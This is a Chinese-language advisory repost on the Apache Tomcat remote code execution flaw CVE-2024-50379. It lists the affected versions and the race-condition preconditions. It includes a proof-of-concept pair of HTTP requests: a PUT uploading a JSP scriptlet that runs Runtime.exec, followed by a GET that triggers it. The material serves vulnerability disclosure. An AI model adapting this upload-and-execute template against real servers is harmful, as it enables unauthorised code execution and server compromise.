https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r
https://mp.weixin.qq.com/s/tsc8wsDkVj7hK12K6lrw2Q
Apache Tomcat 存在远程代码执行漏洞,此漏洞使得攻击者在特定情形下能够避开 Tomcat 的大小写检测机制,上传恶意文件,进而执行远程代码,最终可能致使服务器被彻底掌控,出现数据泄露状况或者服务发生中断。
11.0.0-M1 <= Apache Tomcat < 11.0.2
10.1.0-M1 <= Apache Tomcat < 10.1.34
9.0.0.M1 <= Apache Tomcat < 9.0.98
三、利用条件
如果默认servlet对大小写不敏感的文件系统启用了写(readonly参数设置为非默认值false),那么在同一文件的负载下并发读取和上传可以绕过Tomcat的大小写敏感检查,并导致上传的文件被视为JSP,从而导致远程代码执行。
PUT /test.Jsp·HTTP/1.1
Content-Type:application/json
Host:
aa<%·Runtime.getRuntime().exec("calc.exe");%>
GET /test.jsp HTTP/1.1
Content-Type:application/json
Host:
原文始发于微信公众号(励行安全):新高危漏洞 (含利用方法/POC)| Apache Tomcat 远程代码执行漏洞(CVE-2024-50379)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3524082.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论